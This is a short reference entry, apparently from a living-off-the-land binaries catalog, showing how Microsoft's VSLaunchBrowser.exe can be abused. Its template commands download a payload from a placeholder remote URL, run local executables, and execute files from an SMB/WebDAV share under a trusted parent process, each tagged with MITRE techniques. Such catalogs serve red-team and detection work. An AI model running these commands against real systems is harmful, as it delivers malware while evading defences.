VSLaunchBrowser.exe
Microsoft Visual Studio browser launcher tool for web applications debugging
Download
It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
VSLaunchBrowser.exe .exe {REMOTEURL:.exe}
Download and execute payload from remote server — MITRE: T1105 — Privileges: User
Execute
It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe}
Execute payload via VSLaunchBrowser as parent process — MITRE: T1127 — Privileges: User
It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
VSLaunchBrowser.exe .exe {PATH_SMB}
Execute payload from WebDAV server via VSLaunchBrowser as parent process — MITRE: T1127 — Privileges: User